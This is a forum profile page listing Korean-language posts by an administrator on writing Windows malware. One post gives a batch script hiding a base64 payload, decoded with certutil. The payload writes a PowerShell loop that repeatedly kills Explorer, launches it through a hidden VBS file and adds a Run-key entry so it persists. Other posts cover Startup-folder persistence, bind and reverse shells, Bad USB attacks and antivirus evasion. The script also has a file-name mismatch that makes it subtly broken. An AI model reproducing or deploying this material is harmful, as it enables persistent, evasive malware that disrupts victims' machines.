Jump to content

traitor

Administrators
  • Content Count

    20
  • Joined

  • Last visited

  • Days Won

    8

traitor last won the day on January 27

traitor had the most liked content!

Community Reputation

11 Good

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. traitor

    Initial Access

    Windows Script, Executable, Email, social engineering
  2. traitor

    Help to information ask hack

    you need to kali linux
  3. 악성코드를 제작하고 싶은 사람들은 보통 두가지 목적을 가지고 있다고 생각한다 모의해킹과, 크래킹 난 모의해킹에 대해 다루고싶다. 크래킹이라고 다를건 없다. 다만 다루는 사람이 다를뿐.. 일단 개발하기전에, 공격을 진행할 피해자의 취약점과, 정보는 알고 있지 않고있다고 가정 할 것이다. 2018년 기준 플랫폼은 Windows 7~10으로 가정하겠다. 1. 실행권한 Administrators : 로컬 컴퓨터에 대한 모든 권한을 가진다 User : 로컬 컴퓨터를 사용하게 되는 일반적 권한, User에게 할당되어있는 환경 내에서 작업이 가능하며, 권한이 필요할시 UAC를 통해서 Administrators의 권한을 받아서 사용이 가능하다. Administrators권한이 가지는 가장 큰 이점은, 레지스트리키값의 변조에 있다. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options (디버거 설정) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell (Windows Shell Path) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Windows Shell Path) 와 같은 보안과 매우 밀접한 키에 접근이 가능하다. 2. 공격준비 상대적으로 보안교육을 받지않은 피해자라면, UAC를 바로 수락 할 것이다. 하지만 보안교육을 받은 피해자라면 의심할것이다. UAC를 우회(UAC BYPASS)하는 방법은 취약점을 공략하면 될것이다. 하지만 해당 포스트에선 분량이 너무 길어지니, 다루지않겠다. 피해자의 취약점과, 정보를 알고있지않은 상태이니, 우리는 User권한으로 공략해야한다 User권한으로도 할 수 있는 짓은 생각보다 많다. 우선 시작프로그램 등록부터 진행하자. 지속적인 쉘을 얻어내야 하니까.. %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup 해당 경로에 스크립트나, 실행파일을 copy또는 write해주면 된다. 또는.. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 해당 레지스트리 키에 등록 시켜주면 된다. 3. 공격 먼저 만들 악성코드의 컨셉을 잡아야한다. 랜섬웨어를 만들것인가? 크립토 재킹을 시도할것인가? 원격 쉘? 등등.. 이 있지만 해당 예제에선 다루지않겠다. 다만 단순 공격을 시도할것이다. echo Y | del "%TMP%\enc.tmp" echo QGVjaG8gb2ZmCgpta2RpciAlQVBQREFUQSVcJVVTRVJOQU1FJQoKZWNobyB3aGlsZSgxKSA+ICIlQVBQREFUQSVcJVVTRVJOQU1FJVxBZ2VudC5wczEiCmVjaG8geyA+PiAiJUFQUERBVEElXCVVU0VSTkFNRSVcQWdlbnQucHMxIgplY2hvICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImV4cGxvcmVyIiA+PiAiJUFQUERBVEElXCVVU0VSTkFNRSVcQWdlbnQucHMxIgplY2hvICAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAxID4+ICIlQVBQREFUQSVcJVVTRVJOQU1FJVxBZ2VudC5wczEiCmVjaG8gfSA+PiAiJUFQUERBVEElXCVVU0VSTkFNRSVcQWdlbnQucHMxIgoKZWNobyBQb3dlcnNoZWxsLmV4ZSAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1maWxlICIlQVBQREFUQSVcJVVTRVJOQU1FJVxBZ2VudC5wczEiID4gIiVBUFBEQVRBJVwlVVNFUk5BTUUlXHBheWxvYWQuYmF0IgoKZWNobyBTZXQgb2JqU2hlbGwgPSBDcmVhdGVPYmplY3QoIlNoZWxsLkFwcGxpY2F0aW9uIikgPiAiJUFQUERBVEElXCVVU0VSTkFNRSVccnVuLnZicyIKZWNobyBvYmpTaGVsbC5TaGVsbEV4ZWN1dGUgIiVBUFBEQVRBJVwlVVNFUk5BTUUlXHBheWxvYWQuYmF0IiwgIiIsICIiLCAib3BlbiIsIDAgPj4gICIlQVBQREFUQSVcJVVTRVJOQU1FJVxydW4udmJzIgoKZWNobyBZIHwgcmVnIGFkZCAiSEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIiAvdiAiQXV0b1J1biIgL3QgUkVHX1NaIC9kICIlQVBQREFUQSVcJVVTRVJOQU1FJVxydW4udmJzIgoKIiVBUFBEQVRBJVwlVVNFUk5BTUUlXHJ1bi52YnMiCg== > "%TMP%\enc.tcmp" certutil -decode "%TMP%\enc.tmp" "%TMP%\dec.bat" "%TMP%\dec.bat" 해당 코드를 배치파일로 만들고 Virtual Machine에서 실행해보자. Windows Shell인 Explorer가 날라간다.
  4. traitor

    [Hacking] : [Bad USB]

    아두이노pro를 활용한 공격입니다. 스크립트를 실행하는것으로 Bind Shell을 얻어냅니다.
  5. BindShell (Attacker : Server)(공격자가 서버) ReverseShell (Attacker : Client)(공격자가 클라이언트) 두가지가 있습니다. 바인드쉘은 공격자의 은닉이 쉽지않습니다만, 공격이 쉽습니다. 리버스쉘은 공격자의 은닉이 우월합니다만, 공격과정이 어렵다고 할수있습니다.
  6. 다른 프로세스를 이용해서 write를 진행하는 경우가 많아서 집어넣었습니다.
  7. 악성코드는 보통 한개의 바이너리로만 존재하지않는다. 요즘 악성코드들은, 스크립트를 통해서 바이너리를 추출/다운로드한다. 보통은 base64로 바이너리를 문자열화시킨뒤 certutil.exe를 통해서 파일로 변환시키거나, 파워쉘같은 스크립트를 사용해서 다운로드한다. 이방법을 쓰는 이유는 백신우회나, 안티디버깅에 있다. 방법자체가 백신우회나 안티디버깅이라는 뜻은 아니다. 다만 분석하기 어렵게하거나, 안티디버깅할때 자주쓰이는 방법이다.
  8. 백신의 우회는 악성코드의 고질적 문제점입니다. 정적/동적의 탐지를 피해, 피해자를 만드는 과정은 점점 고도화되어가고있으며, 이를 탐지하기 위해서 백신은 더 많은 기술을 도입하기 시작합니다. 저는 정/동적 탐지의 우회를 다룰까 합니다. 1. 정적분석우회 파일을 뜯어서 패턴/해쉬와 비교하는 방식입니다. 장점 : 정확합니다. 오탐률이 적습니다. 단점 : 변종을 못 찾아 낼 수 있습니다. 우회 방법 : 가능한 모든 상수값의 암호화/인코딩 2. 동적분석우회 실행파일이 어떤 함수를 로드하며, 함수의 인자값을 후킹하여 알아내는 방식입니다. 장점 : 정적분석으로 못찾아낸 악성코드를 찾아낼수있습니다. 단점 : 오탐이 있을 수 있습니다. 우회방법 : 파일리스공격, 스크립트사용, 다른 실행파일 드랍후 실행 등등..
  9. 없습니다. 죄송합니다
×

Important Information

I have read and accept the above terms.